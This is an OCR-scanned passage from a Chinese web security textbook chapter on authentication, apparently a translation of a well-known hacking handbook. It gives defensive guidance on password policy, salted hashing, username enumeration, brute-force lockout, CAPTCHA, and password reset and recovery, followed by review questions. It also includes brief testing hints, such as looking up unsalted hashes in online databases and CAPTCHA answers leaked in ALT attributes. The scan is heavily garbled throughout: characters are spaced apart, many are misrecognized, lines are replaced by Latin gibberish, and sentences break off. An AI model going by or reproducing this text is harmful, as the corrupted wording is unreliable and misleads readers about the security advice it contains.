漏洞 ， 设 法 确定 应 用 程序 将 用 户 证 书 保存 在 数据 库 或 文件 系统 的 什 


ARE. 
: (a) 找到 这 些 位 置 ， 弄 清 应 用 程序 是 否 以 非 加 密 形 式 保 
PE HY, 

Cb) 如 果 以 散 列 形式 存储 密码 ， 则 应 检查 表明 账户 分 配 
PIREN, ARAIRE Malr AEREN 
CO 如 果 使 用 标准 算法 以 < 不 加 salt 的 散 列 "形式 存储 密 
码 ， 则 应 查询 在 线 散 列 数据 库 ， 以 确定 对 应 的 明文 密码 值 。 











6.4_ 保 障 验证 机 制 的 安 


执行 安全 的 验证 解决 方案 需要 同时 满足 几 个 关键 安全 目标 ， 许 多 时 
候 也 需要 牺牲 其 他 目标 ， 如 功能 、 易 用 性 和 总 成 本 。 有 些 时 候 ,“ 更 
加 ”安全 实际 上 可 能 适得其反 。 例 如 ， 强 迫 用 户 设置 超 长 密码 并 频繁 修 
改 密码 往往 促使 他 们 将 密码 记录 下 来 《因而 导致 密码 泄露 〉。 

鉴于 验证 漏洞 的 多 样 性 ， 以 及 应 用 程序 需要 采取 非常 复杂 的 防御 措 
施 以 减轻 所 有 这 些 漏洞 的 危害 ， 许 多 应 用 程序 设计 者 与 开发 者 选择 接受 
东 些 威胁 ， 以 集中 精力 阻止 最 严重 的 攻击 。 在 实现 这 种 防御 平衡 的 过 程 
中 ， 我 们 需要 考 碟 以 下 因 妹 。 

口 应 用 程序 所 提供 功能 的 安全 程度 。 

口 用户 对 不 同类 型 的 验证 控制 的 容 妨 和 接受 程度 。 

口 文 持 一 个 不 够 友好 的 用 户 界 面 系统 所 需 的 成 本 。 

口 元 争 性 解决 方案 相对 于 应 用 程序 可 能 产生 的 收入 方面 的 金融 成 本 
或 它 所 保护 资产 的 价值 。 

我 们 将 在 本 节 说 明 阻止 各 种 针对 验证 机 制 攻击 的 最 有 效 方法 ， 然 后 
让 读者 自行 决定 哪 种 防御 措施 最 适合 他 们 的 特殊 需求 。 


6.4.1 Ay Se AE 


口 应 强制 执行 适当 的 最 小 密码 强度 要 求 。 这 些 要 求 包括 : 最 小 密码 
长 度 ， 使 用 字母 、 数 字 和 排版 字符 ， 同 时 使 用 大 、 人 小 写字 符 ， 避 免 使 用 
字典 中 的 单词 、 名 称 和 其 他 常见 密码 ， 避 免 以 用 户 名 为 密码 ， 避 免 使 用 
和 以 前 的 密码 相似 或 完全 相同 的 密码 。 和 大 多 数 安全 措施 一 样 ， 不 同 的 
密码 强度 要 求 适用 于 不 同类 型 的 用 户 。 

a 应 使 用 唯一 的 用 户 名 。 

口 系统 生成 的 任何 用 户 名 和 密码 应 具有 足够 的 随机 性 ， 其 中 不 包含 
任何 顺序 ， 即 使 攻击 者 访问 大 量 连 续 生 成 的 实例 也 无 法 对 其 进行 预测 。 

口 允许 用 户 设 置 足够 强大 的 密码 。 例 如 ， 应 允许 其 设置 长 密码 ， 允 
许 在 密码 中 使 用 各 种 类 型 的 字符 。 


6.4.2 ”安全 处 理 证 书 
口 应 以 不 会 造成 非 授权 泄露 的 方式 创建 、 保 存 和 传送 所 有 证 书 。 














口 应 使 用 公认 的 加 密 技 术 〈 如 SSL) 保护 客户 端 与 服务 器 间 的 所 有 
通信 。 既 无 必要 也 不 需要 使 用 定制 解决 方案 保护 传输 中 的 数据 。 

口 如 果 认 为 最 好 在 应 用 程序 的 不 需 验 证 的 区 域 使 用 HITP， 必 须 保 
证 使 用 HTTPS 加 载 登录 表单 ， 而 不 是 在 提交 登录 信息 时 才 转 换 到 
HTTPS. 

口 只 能 使 用 POST 请 求 向 服务 强 传 输 证 书 。 绝 不 能 将 证 书 放 在 URL 
参数 或 cookie 中 (即使 临时 放置 也 不 行 )。 绝 不 能 将 证 书 返 还 给 客户 
端 ， 即 使 是 通过 重 定 问 参数 传送 也 不 行 。 

口 所 有 服务 器 一 客户 端 应 用 程序 组 件 应 这 样 保存 证 书 : 即使 攻击 者 
能 够 访问 应 用 程序 数据 库 中 存储 的 所 有 相关 数据 ， 他 们 也 无 法 轻易 恢复 
证 书 的 原始 值 。 达 到 这 种 目的 最 常用 的 方法 是 使 用 强大 的 散 列 函数 《〈 如 
至 本 书 截 稿 时 的 SHA-256 函 数 ) ， 并 对 其 进行 “加 Salt 处理? 以 降低 预先 计 
算 的 离线 攻击 〈precomputed offline attack) 的 危害 。 该 salt 应 特定 于 拥有 
密码 的 账户 ， 以 防止 攻击 者 重播 或 奉 换 散 列 值 。 

口 一 般 来 说 ， 客 户 端 “ 记 住 我 ?功能 应 仅 记 忆 如 用 户 名 之 类 的 非 保 密 
数据 。 在 安全 要 求 较 低 的 应 用 程序 中 ， 可 适当 允许 用 户 选 择 一 种 工具 来 
记 住 密码 。 在 这 种 情况 下 ， 客 户 端 不 应 保存 明文 证 书 〈 应 使 用 密 钥 以 可 
逆 加 密 的 形式 保存 密码 ， 且 只 有 服务 器 知道 这 个 密 铀 ) ; FFA PSS 
直接 访问 他 们 的 计算 机 或 远程 攻破 他 们 计算 机 的 攻击 者 可 能 造成 的 风 
险 。 应 特别 注意 消除 应 用 程序 中 存在 的 可 用 于 盗 德 其 中 保存 的 证 书 的 跨 
站 点 脚本 漏洞 (请 参阅 第 12 章 了 解 相关 内 容 〉。 

a ee eee eee 

O 如 果 以 非 正常 交互 的 形式 同 新 建 账户 分 配 证 书 ， 应 以 尽 可 能 安全 
的 形式 传送 证 书 ， 并 设置 时 间 限 制 ， 要 求 用 户 在 第 一 次 登录 时 更 改 证 
书 ， 并 告诉 用 户 在 初次 使 用 后 销毁 通信 渠道 。 

口 应 考虑 在 适当 的 地 方 使 用 下 拉 沫 单 而 非 文 本 字段 截取 用 户 的 一 些 
登录 信息 《如 值得 纪念 的 词 中 的 一 个 字母 ) 。 这 样 做 可 防止 安装 在 用 户 
计算 机 上 的 键盘 记录 器 截获 他 们 提交 的 所 有 数据 。 (但 是 ， 还 请 注意 ， 
简单 的 键盘 记录 器 只 是 攻击 者 用 于 截获 用 户 输入 的 一 种 手段 。 如 果 攻 击 
者 已 经 攻破 用 户 的 计算 机 ， 那 么 从 理论 上 讲 ， 他 就 能 够 记录 计算 机 上 发 
E E 
Fo ) 


6.4.3 ”正确 确 认证 书 
O 应 确认 完整 的 密码 。 也 就 是 说 ， 区 分 大 小 写 ， 不 过 滤 或 修改 任何 






























































字符 ， 也 不 截 短 密码 。 

o 应 用 程序 应 在 登录 处 理 过 程 中 主动 防御 无 法 预料 的 事件 。 例 如 ， 
根据 所 使 用 的 开发 语言 ， 应 用 程序 应 对 所 有 API 调 用 使 用 “全 捕获 ”型 寞 
常 处 理 程序 (catch-all exception handler) 。 这 些 程序 应 明确 删除 用 于 控 
制 登 录 状 态 的 所 有 会 话 和 方法 内 部 数据 (method-local data) ， 并 使 当前 
i 因此 ， 即 使 攻击 者 以 某 种 方式 避 开 验证 ， 也 会 被 服务 器 
强制 退出 。 

口 应 对 验证 逻辑 的 伪 代 人 码 和 实际 的 应 用 程序 源 代码 进行 仔细 的 代码 
审查 ， 以 确定 故障 开放 条 件 之 类 的 逻辑 错误 。 

口 如 果 应 用 程序 执行 支持 用 户 伪 装 功能 ， 应 严格 控制 这 种 功能 ， 以 
防止 攻击 者 滥用 它 获 得 未 授权 访问 。 鉴 于 这 种 功能 的 危险 程度 ， 通 党 有 
必要 从 面向 公众 的 应 用 程序 中 彻底 删除 该 功能 ， 只 对 内 部 管理 用 户 开 放 
该 功能 ， 而 且 他 们 使 用 伪装 也 应 接受 严格 控制 与 审核 。 

口 应 对 多 阶段 登录 进行 严格 控制 ， 以 防止 攻击 者 破坏 登录 阶段 之 间 


的 转换 与 关系 。 
B ”有关 登录 阶段 进展 和 前 面 验证 任务 结 末 的 所 有 数 
气 应 保存 在 服务 器 端 会 话 对 象 中 ， 绝 不 可 传送 给 客户 














端 或 由 其 读 取 。 
四 ”禁止 用 户 多 次 提交 一 项 登录 信息 ; 禁止 用 户 修改 





已 经 被 收集 或 确认 的 数据 。 如 果 需 要 在 几 个 阶段 使 用 
同一 个 数据 《如 用 户 名 ) ， 应 在 第 一 次 收集 时 将 该 数 
据 保 存在 会 话 变量 中 ， 随 后 从 此 处 引用 该 数据 。 
”在 每 一 个 登录 阶段 ， 应 首先 核实 前 面 的 阶段 均 已 
顺利 完成 。 如 果 发 现 前 面 的 阶段 没有 完成 ， 应 立即 将 
验证 尝试 标记 为 恶意 尝试 。 
”为 防止 泄露 的 是 哪个 登录 阶段 失败 (攻击 者 可 利 
用 它 轮 流 针 对 每 个 阶段 发 动 攻 击 〉 的 信息 ， 即 使 用 户 
无 法 正确 完成 前 面 的 阶段 、 即 使 最 初 的 用 户 名 无 效 ， 
应 用 程序 也 应 总 是 处 理 完 所 有 的 登录 阶段 。 在 处 理 完 
所 有 的 登录 阶段 后 ， 应 用 程序 应 在 最 后 阶段 结束 时 呈 
I 
王 何 信 息 。 

口 如 果 在 登录 过 程 中 需要 回答 一 个 随机 变化 的 问题 ， 请 确保 攻击 者 


无 法 选择 回答 问题 。 
时。 总 古 采 用 一 个 多 阶段 登录 过 程 ， 在 第 一 阶段 确认 
用 户 吴 份 ， 并 在 后 面 的 阶段 回 用 户 提 出 随机 变化 的 问 
题 。 
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题 保存 在 永久 性 用 户 资料 中 ， 确 保 每 次 该 用 户 答 试 登 
录 时 同 其 提出 相同 的 问题 ， 直 到 该 用 户 正 确 回 答 关 个 
问题 。 

”如 果 疝 茶 个 用 户 提 出 一 个 随机 变化 的 质询 ， 将 所 
出 的 问题 保存 在 服务 需 端 会 话 变量 而 非 HIML 表 单 的 
隐 眠 字段 中 ， 并 根据 保存 的 问题 核实 用 户 随 后 提供 的 


rt AN o 
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=> 注解 以 上 详细 介绍 了 设计 一 个 安全 验证 机 制 的 微妙 之 
处 。 提 出 一 个 随机 变化 的 问题 时 稍 不 谨慎 就 可 能 给 攻击 者 提供 用 户 
名 枚 举 的 机 会 。 例 如 ， 为 防止 攻击 者 选择 回答 他 知道 答案 的 问题 ， 
应 用 程序 可 能 会 将 该 用 户 提出 的 最 后 一 个 问题 保存 在 用 户 资 料 中 ， 
并 不 断 提 出 该 问题 下 到 得 到 正确 答案 。 这 样 ， 使 用 相同 用 户 名 多 次 
登录 的 攻击 者 就 会 遇 到 相同 的 问题 。 但 是 ， 如 果 攻 击 者 使 用 一 个 无 
效 的 用 户 名 进行 相同 的 操作 ， 应 用 程序 处 理 的 方法 可 能 会 有 所 不 
同 : 由 于 没有 与 无 效用 户 名 有 关 的 用 户 资料 ， 也 没有 问题 被 保存 起 
来 ， 因 此 ， 应 用 程序 将 提出 一 个 不 同 的 问题 。 攻 击 者 可 以 利用 这 种 
在 多 次 登录 沦 试 中 表现 出 来 的 行为 着 异 ， 推 斯 东 个 特殊 用 尸 名 的 有 
效 性 。 在 一 次 目 定 义 攻 击 中 ， 攻 击 者 能 够 迅速 获得 大 量 用 户 名 。 
如 琳 应 用 程序 希望 防御 这 种 可 能 性 ， 它 必须 采取 一 些 预 防 措 
施 。 如 采 收 到 使 用 无 效用 户 名 及 起 的 登录 答 试 ， 应 用 程序 必须 在 茶 
个 位 置 记录 回 这 个 无 效用 户 名 提出 的 随机 问题 ， 并 确保 随后 使 用 这 
个 用 户 名 登录 都 会 遇 到 相同 的 问题 。 更 进一步 ， 应 用 程序 可 定期 更 
换 到 一 个 不 同 的 问题 ， 模 拟 不 存在 的 用 户 已 作为 正常 用 户 登 录 ， 导 
致 提出 的 下 一 个 问题 出 现 变 化 。 但 是 ， 从 茶 种 意义 上 说 ， 应 用 程序 














口 应 用 程序 使 用 的 各 种 验证 机 制 不 应 通过 公开 的 消 轧 ， 或 者 通过 从 
应 用 程序 的 其 他 行为 进行 推 亲 ， 来 揭示 关于 验证 参数 的 任何 信息 。 攻 击 
者 应 无 法 判定 是 提交 的 哪个 数据 造成 了 问题 。 
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录 答 试 。 这 样 做 可 避免 由 不 同 代 码 路 径 返 回 的 本 应 不 包含 大 量 信 息 的 消 
轧 ， 因 为 消息 排版 方面 的 差异 、 不 同 的 HTTP 状态 码 、 其 他 隐 苦 在 
In ee 
{Fl o 
口 如 果 应 用 程序 实行 茶 种 账户 锁定 以 防止 覃 力 攻 击 《〈 如 6.4.5 节 所 
述 ) ， 应 小 心 处 理 以 防 造成 信息 泄露 。 例 如 ， 如 果 应 用 程序 透露 ， 由 于 
Y 次 失败 登录 ， 已 将 某 个 特殊 的 账户 冻结 X 分 钟 ， 这 种 行为 就 可 被 用 于 枚 
举 有 效 的 用 户 名 。 另 外 ， 明 确 公 开 账 户 锁定 策略 标准 也 使 攻击 者 能 够 调 
整 任 何 登录 答 试 ， 不 顾 锁定 政策 继续 猜测 密码 。 为 避免 用 户 名 枚 举 ， 如 
末 从 相同 浏览 右 发 出 一 系列 失败 的 登录 答 试 ， 应 用 程序 应 通过 一 条 御 规 
Aten Se: 如 果 出 现 多 次 登录 失败 ， 账 尸 将 被 冻结 ， 并 建议 用 户 稍 
后 再 试 。 可 通过 使 用 一 个 cookie 或 隐藏 字段 退 踪 来 目 相同 浏览 器 的 重复 
登录 失败 ， 从 而 达到 上 述 目 的 。《〈 当 然 ， 不 应 使 用 这 种 机 制 实 行 任何 实 
际 的 安全 控制 ， 仪 用 于 为 努力 回忆 其 证 书 的 普通 用 户 提 供 帮助 。) 
口 如 果 应 用 程序 支持 自我 注册 ， 那 么 它 能 够 以 两 种 方式 防止 这 种 功 
能 被 用 于 枚 举 现 有 用 户 名 。 
”不 允许 自我 选择 用 户 名 ， 应 用 程序 可 为 每 个 新 用 
户 建立 一 个 唯一 《和 无 法 预测 ) 的 用 户 名 ， 防 止 应 用 
程序 披露 表明 一 个 选 定 的 用 户 名 已 经 存在 的 信息 。 
时。 应 用 程序 可 以 使 用 电子 邮件 地 址 作为 用 户 名 。 如 
果 是 这 样 ， 应 用 程序 会 在 登录 过 程 的 第 一 个 阶段 要 求 
用 户 输 入 他 们 的 电子 邮件 地 址 ， 然 后 告诉 他 们 等 待 接 
收 一 封 电子 邮件 ， 按 照 其 中 的 指示 操作 。 如 果 电 子 邮 
件 地 址 已 经 被 注册 ， 应 用 程序 会 在 电子 邮件 中 通知 用 
户 。 如 果 该 地 址 没有 被 注册 ， 应 用 程序 会 要 求 用 户 访 
问 一 个 唯一 的 、 无 法 猜测 的 URL 继 续 注 册 过 程 。 这 样 
可 防止 攻击 者 枚 举 有 效 的 用 户 名 除非 他 们 碰巧 已 经 
攻破 大 量 电子 邮件 账户 ) 。 


6.4.5 防止 蛋 力 攻击 


口 必须 对 验证 功能 执行 的 各 种 质询 采取 保护 措施 ， 防 止 攻击 者 企图 
使 用 自动 工具 啊 应 这 些 质询 。 这 包括 登录 机 制 、 修 改 密码 功能 和 恢复 遗 
未 密码 等 功能 中 的 质询 。 

o 使 用 无 法 预测 的 用 户 名 ， 同 时 阻止 用 户 名 枚 举 ， 给 完全 盲目 的 蛮 
力 攻 击 设置 巨大 障碍 ， 并 要 求 攻击 者 在 实施 攻击 前 已 经 通过 茶 种 方式 发 
































现 一 个 或 几 个 特殊 的 用 户 名 。 

O 一 些 对 安全 性 要 求 极 高 的 应 用 程序 〈 如 电子 银行 ) 在 检测 到 少数 
几 次 〈 如 3 次 ) 登录 失败 后 应 立即 茶 用 该 账户 ， 并 要 求 账户 所 有 者 采取 
各 种 非常 规 步 又 重新 激活 该 账户， 如 给 呼叫 中 心 拨打 电话 并 回答 一 系列 
安全 问题 。 这 种 策略 的 缺点 在 于 : 它 允 许 攻击 者 通过 重复 禁用 合法 用 户 
的 账户 同 他 们 发 动 拒绝 服务 攻击 ， 因 而 增加 了 提供 账 尸 恢复 服务 的 成 
本 。 一 种 更 加 均衡 的 集 略 适用 于 非常 注 章 安全 的 应 用 程序 ， 即 在 检测 到 
少数 几 次 《如 3 次 ) 登录 失败 后 将 该 账户 冻结 一 段 时 间 (如 30 分 钟 〉。 
这 种 集 略 可 有 效 阻止 密码 猜测 攻击 ， 同 时 可 降低 拒绝 服务 攻击 风险 ， 减 
轻 呼 叫 中 心 的 工作 负担 。 

z 口 如 果 采 用 临时 冻结 账户 的 策略 ， 应 采取 措施 确保 这 种 策略 的 效 


四。 为 防止 信息 泄露 导致 用 户 名 枚 举 ， 应 用 程序 绝 不 
能 透露 任何 账户 冻结 信息 。 相 反 ， 应 用 程序 应 对 一 系 
列 即使 是 使 用 无 效用 户 名 发 起 的 失败 登录 做 出 啊 应 ， 
通过 一 条 钊 规 消息 提出 警告 : 如 果 出 现 多 次 登录 失 
hi A 
述 ) 。 
me ”应 用 程序 不 应 器用 户 透露 账户 锁定 标准 。 只 要 告 
诉 合 法 用 户 “ 稍 后 再 试 ? 并 不 会 显著 降低 服务 质量 。 但 
告知 攻击 者 应 用 程序 到 底 能 够 容忍 多 少 次 失败 的 登录 
尝试 、 账 户 浆 结 期 有 多 长 ， 束 会 让 他 们 对 任何 登录 尝 
试 进行 调整 ， 不 顾 账 户 锁定 策略 而 继续 猜测 密码 。 
和 ”如果 一 个 账户 被 冻结 ， 那 么 应 用 程序 不 用 检查 用 
户 证 书 ， 直 接 就 可 以 拒绝 该 账户 的 登录 答 试 。 因 为 一 
些 应 用 程序 在 冻结 期 继续 完全 处 理 登 录 和 尝试 ， 并 且 在 
提交 有 效 证 书 时 返回 一 条 差异 并 不 明显 (或 者 差异 比 
较 明显 ) 的 消 轧 ， 因 此 尽管 应 用 程序 执行 账户 冻结 策 
a 0 
Kt. 
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没有 帮助 ， 即 过 历 大 量 枚 举 出 的 用 户 名 ， 检 查 单 独 一 个 脆弱 密码 ， 如 
password。 例 如 ， 如 果 5 次 登录 失败 就 会 触发 账户 冻结 ， 这 意味 独 攻 击 
者 能 够 对 每 个 账户 尝试 使 用 4 个 不 同 的 密码 ， 而 不 会 引起 任何 中 断 。 如 
果 一 个 应 用 程序 使 用 许多 脆弱 密码 ， 使 用 上 述 攻 击 手段 的 攻击 者 就 能 够 
攻破 许多 账户 。 

当然 ， 如 果 验 证 机 制 其 他 区 域 的 设计 安全 可 徘 , 这 种 攻击 的 效率 就 












































会 显著 降低 。 如 果 攻 击 者 无 法 枚 举 或 有 效 预 测 出 用 户 名 ， 他 就 需要 实施 
蛮 力 攻击 以 猜测 用 户 名 ， 其 攻击 速度 也 随 之 减 慢 。 如 果 应 用 程序 执行 了 
严格 的 密码 强度 要 求 ， 攻 击 者 更 没有 可 能 选 择 某 个 应 用 程序 用 户 已 经 选 
择 的 密码 进行 测试 。 

除 以 上 控制 外 ， 应 用 程序 还 可 以 在 每 个 可 能 成 为 蛮 力 攻击 目标 的 页 
面 ( 见 图 6-9) 使 用 CAPTCHA 邮 (全 自动 区 分 人 类 和 计算 机 的 图 灵 测 
i) 质询 ， 专 门 防御 这 种 攻击 。 实 际 上 ， 这 种 措施 可 防止 攻击 者 癌 任 何 
应 用 程序 页 面 自动 提交 数据 ， 从 而 阻止 其 手动 实施 各 种 密码 猜测 攻击 。 
实际 上 ， 人 们 已 经 对 CAPTCHA 技 术 进 行 了 大 量 的 研究 。 有 些 时 候 ， 针 
对 这 种 技术 的 自动 攻击 已 经 能 够 取得 相当 的 成 效 。 此 外 ， 一 些 攻击 者 其 
至 发 起 了 破解 CAPTCHA 的 芜 赛 ， 利 用 不 知情 的 公众 人 物 作为 标 训 帮助 
攻击 者 实施 攻击 。 但 是 ， 即 使 一 类 特殊 的 质询 无 法 完全 生效 ， 它 仍然 可 
人 
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图 6-9 ” 旨 在 阻止 自动 攻击 的 CAPTCHA 控 件 








YY 提示 攻击 者 在 攻击 一 个 使 用 CPATCHA 控 件 阻止 目 动 攻 

击 的 应 用 程序 时 一 定 会 仔细 检查 图 像 页 面 的 HIML 源 代码 。 我 们 曾 
遇 到 过 许多 实例 ， 其 中 谜 题 的 答案 以 文字 形式 出 现在 图 像 标签 的 

ALTI 属 性 或 一 个 隐藏 表单 字段 中 ， 这 使 精明 的 攻击 者 不 必 解 开 谜 题 
就 可 以 解除 应 用 程序 执行 的 保护 。 





口 应 用 程序 应 始终 执行 密码 修改 功能 ， 人 允许 定期 使 用 的 密码 到 期 终 
E (如 有 必要 ) 并 允许 用 户 修 改 密码 (不 管 他 们 出 于 任何 原因 希望 修改 
ee ee ee eer 
WH. 

口 只 能 从 已 通过 验证 的 会 话 中 访问 该 功能 。 

口 不 应 以 任何 方式 直接 提供 用 户 名 ， 也 不 能 通过 隐藏 表单 字段 或 
cookie 提 供用 户 名 。 用 户 企 图 修改 他 人 密码 的 行为 属 非法 行为 。 

口 作 为 一 项 高 级 防御 措施 ， 应 用 程序 应 对 密码 修改 功能 加 以 保护 ， 
防止 攻击 者 通过 其 他 安全 缺陷 ， 如 会 话 动 持 漏 洞 、 路 站 点 脚本 ， 甚 至 是 
C ee ene ae 

现 有 密码 。 

口 为 防止 错误 ， 新 密码 应 输入 两 次 。 应 用 程序 应 首先 比较 “新 密 
码 ” 与 “确认 新 密码 ?字段 ， 看 它们 是 否 匹 配 ， 如 果 不 相 匹配 ， 返 回 一 条 
VEN fa RAS 

口 该 功能 应 阻止 可 能 针对 主要 登录 机 制 的 各 种 攻击 : EY RY 
规 错误 消息 告知 用 户 现 有 证 书 中 出 现 的 任何 错误 ， 如果 修改 密码 的 尝试 
出 现 少 数 几 次 失败 ， 应 临时 冻结 该 功能 。 

口 应 使 用 非常 规 方式 《如 通过 电子 邮件 ) 通知 用 户 其 密码 已 被 修 
改 ， 但 通知 消息 中 不 得 包含 用 户 的 旧 证 书 或 新 证 书 。 























口 当 用 户 遗 忘 密码 时 ， 许 多 安全 性 至 关 重 要 的 应 用 程序 (如 电子 银 
ÍT) 通过 非常 规 方式 完成 账户 恢复 : 用 户 必须 给 呼叫 中 心 打 电话 并 回答 
一 系列 安全 问题 ， 新 证 书 或 重新 激活 代码 也 以 非常 规 方式 〈 通 过 传统 的 
邮件 ) 送 往 用 户 注册 的 家 许 住 址 。 绝 大 多 数 应 用 程序 并 不 需要 这 种 程度 
的 安全 保护 ， 只 需 使 用 目 动 恢 复 功 能 即 可 。 

口 精心 设计 的 密码 恢复 机 制 需 要 防止 账户 被 未 授权 方 攻破 ， 避 免 给 
合法 用 户 造 成 任何 使 用 中 断 。 

口 绝对 不 要 使 用 密码 “暗示 ”之 类 的 特性 ， 因 为 攻击 者 可 利用 明显 的 
Has AIK PY RB o 

口 通 过 电子 邮件 给 用 户 发 送 一 个 唯一 的 、 有 具有 时 间 限 制 的、 无 法 猜 
汕 的 一 次 性 恢复 URL 是 帮助 用 户 重 新 控制 账户 的 最 佳 目 动 化 解决 方案 。 
这 封 电子 邮件 应 送 至 用 户 在 注册 阶段 提供 的 地 址 中 。 用 户 访问 该 URL 即 
可 设置 新 密码 。 之 后 ， 应 用 程序 会 同 用户 送出 为 一 封 电 子 邮 件 ， 说 明 密 
码 已 被 修改 。 为 防止 攻击 者 通过 不 断 请 求 密码 重新 激活 电子 邮件 而 向 用 
户 发 动 拒 绝 服 务 攻击 ， 在 证 书 得 到 修改 前 ， 用 户 原 有 证 书 应 保持 有 效 。 























O 为 进一步 防止 未 授权 访问 ， 应 用 程序 可 能 会 癌 用 户 提出 一 个 次 要 
质询 ， 用 户 必 须 在 使 用 密码 重 设 功能 前 完成 该 质询 。 设 计 质 询 时 应 小 心 
ETE, MRAR IAK INDRA 

”应 用 程序 应 在 注册 阶段 规定 : 质询 应 对 每 一 名 用 
户 提出 同一 个 或 同一 组 问题 。 如 果 用 户 提供 目 己 的 质 
询 ， 可 能 其 中 会 有 一 些 非常 易于 受到 攻击 ， 这 也 使 攻 
a 
效 的 账户 。 

下 ”质询 啊 应 必须 具有 足够 的 随机 性 ， 确 保 攻 击 者 无 
法 轻易 猜测 出 来 。 例 如 ， 询 问 用 户 就 读 的 小 学 名 称 就 
优 于 询问 他 们 最 喜欢 的 颜色。 

E ”为 防 正 蛮 力 攻 击 ， 如 果 多 次 答 试 完成 质询 都 以 失 
败 告终 ， 应 临时 冻结 相关 账户 。 

E ”如果 质询 没有 得 到 正确 啊 应 ， 应 用 程序 不 应 泄露 
任何 相关 信息 ， 如 用 户 名 的 有 效 性 、 账 尸 冻 结 等 。 

E ”成功 完成 质询 后 ， 应 继续 完成 上 文 描述 的 处 理 过 
程 ， 即 向 用 户 注 册 的 电子 邮件 地 址 发 送 一 封包 含 重 新 
激活 URL 的 电子 邮件 。 无 论 在 什么 情况 下 ， 应 用 程序 
都 不 得 透露 用 户 遗 扎 的 密码 或 简单 将 用 户 放 入 一 个 通 
过 验证 的 会 话 中 。 此 外 ， 最 好 不 要 直接 进入 密码 重 设 
功能 ， 因 为 与 初始 密码 相 比 ， 攻 击 者 通常 更 容易 猜测 
出 账户 恢复 质询 的 啊 应 ， 因 此 应 用 程序 不 应 依赖 它 对 
用 户 进行 验证 。 




















口 应 用 程序 应 在 日 志 中 记录 所 有 与 验证 有 关 的 事件 ， 包 括 登录 、 退 
出 、 密 码 修改 、 密 码 重 设 、 账 户 冻 结 与 账户 恢复 。 应 在 适当 的 地 方 记录 
所 有 失败 与 成 功 的 登录 尝试 。 日 志 中 应 包含 一 切 相关 细节 (如 用 户 名 和 
人 P 地 址 ) ， 但 不 得 泄露 任何 安全 机 密 〈 如 密码 ) 。 应 用 程序 应 为 日 志 提 
供 强 有 力 的 保护 以 防止 未 授权 访问 ， 因 为 它们 是 信息 泄露 的 主要 源头 。 

口 应 用 程序 的 实时 警报 与 入 侵 防御 功能 应 对 验证 过 程 中 的 异常 事件 
进行 处 理 。 例 如 ， 该 功能 应 向 应 用 程序 管理 员 通 报 所 有 变 力 攻击 模式 ， 
便于 他 们 采取 适当 的 防御 与 攻击 措施 。 

口 应 以 非常 规 方式 向 用 户 通报 任何 重大 的 安全 事件 。 例 如 ， 用 户 修 
改 密码 后 ， 应 用 程序 应 向 他 注册 的 电子 邮件 地 址 发 送 一 封 邮件 。 

口 应 以 非常 规 方式 向 用 户 通报 经 党 发生 的 安全 事件 。 例 如 ， 用 户 成 























功 登 录 后 ， 应 用 程序 应 向 用 户 通 报 上 次 登录 的 时 间 与 来 源 IP/ 域 ， 以 及 从 
那 以 后 进行 的 无 效 登 录 尝 试 的 次 数 。 如 果 用 户 获悉 其 账户 正 遭 受 密码 猿 
测 攻击 ， 他 残 更 有 可 能 会 经 常 修改 密码 ， 并 设置 一 个 安全 性 高 的 密码 。 





6.5 ”小结 


验证 功能 可 能 是 应 用 程序 受 攻击 面 中 的 首要 目标 。 并 无 特权 的 匿名 
用 户 可 直接 访问 该 功能 ， 如 果 攻 击 者 破坏 了 该 功能 ， 就 可 以 访问 受到 保 
护 的 功能 和 敏感 数据 。 验 证 功能 是 应 用 程序 安全 防御 机 制 的 核心 ， 也 是 
防御 未 授权 访问 的 前 沿 阵 地 。 

现实 中 的 验证 机 制 存在 着 大 量 的 设计 与 执行 缺陷 。 使 用 系统 化 的 方 
法 尝试 各 种 攻击 途径 ， 即 可 对 这 些 缺 陷 发 起 全 面 有 效 的 攻击 。 许 多 时 
候 ， 攻 击 目标 显而易见 ， 如 保密 性 不 强 的 密码 、 发 现 用 户 名 的 方法 和 可 
力 攻击 漏 筒 。 必 一 方面 ， 有 些 缺 陷 隐 藏 得 很 深 ， 需 要 对 复杂 的 登录 过 程 
进行 仔细 的 分 析 才 能 发 现 可 供 利用 以 “ 台 开 应 用 程序 大 门 ” 的 细微 多 辑 缺 
陷 。 

“四 处 伍 探 ”是 攻击 验证 功能 最 第 用 的 方法 。 除 主 登 录 表单 外 ， 可 能 
还 包括 注册 新 账户 、 修 改 密码 、 记 住 密 码 、 恢 复 遗 起 的 密码 与 伪 六 其 他 
用 户 等 功能 。 以 上 每 一 种 功能 都 可 能 成 为 潜在 缺陷 的 主要 来 源 ， 在 一 项 
功能 中 特意 避免 的 问题 往往 义 会 在 其 他 功能 中 重新 出 现 。 花 费 一 些 时 间 
ee ee ee 
得 到 显著 增强 。 




















6.6 问题 


欲 知 问题 答案 ， 请 访问 http:/mdsec.net/wahh。 
C1) 在 测试 一 个 使 用 joe 和 pass 证 书 登 录 的 Web 应 用 程序 的 过 程 
中 ， 在 登录 阶段 ， 在 拦截 代理 服务 器 上 看 到 一 个 要 求 访问 以 下 URL 的 请 
求 : 


http://www.wahh-app.com/app? 
action=login&uname=joe&password=pass 

如 果 不 再 进行 其 他 探测 ， 可 以 确定 哪 3 种 漏洞 ? 

(2) 自我 注册 功能 如 何 会 引入 用 户 名 枚 举 漏洞 ? 如 何 防止 这 些 漏 
y]? 
(3) 一 个 登录 机 制 由 以 下 步骤 组 成 
Ca) 应 用 程序 要 求 用 户 提 交 用 户 名 和 密码 ; 
(b》〉 应 用 程序 要 求 用 户 提 交 值 得 纪念 的 词 中 的 两 个 随机 
选择 的 字母 。 

应 用 程序 为 何 要 求 用 户 分 两 个 阶段 提供 所 需 的 信息 ? 如 果 不 这 样 
做 ， 登 录 机 制 将 存在 什么 缺陷 ? 

(4) 一 个 多 阶段 登录 机 制 要 求 用 户 首先 提交 用 户 名 ， 然 后 在 后 续 
ee 
上 阶段 。 

这 种 机 制 存 在 什么 缺点 ? 如 何 修复 这 种 漏洞 ? 

(5) 应 用 程序 在 登录 功能 中 整合 了 反 钓 鱼 机 制 。 注 册 过 程 中 ， 每 
名 用 户 从 应 用 程序 提供 的 大 量 图 片 中 选择 一 幅 特 殊 的 图 片 。 登 录 机 制 由 
以 下 步骤 组 成 : 

Ca) 用 户 输 入 其 用 户 名 和 出 生日 期 ; 

(b》 如 果 这 些 信息 无 识 ， 应 用 程序 向 用 户 显 示 他 们 选择 
的 图 片 ， 如 果 信 息 有 误 ， 随 机 显示 一 幅 图 片 ; 

Cc) 用 户 核 实 应 用 程序 显示 的 图 片 ， 如 果 图 片 正确 ， 输 
入 他 们 的 密码 。 

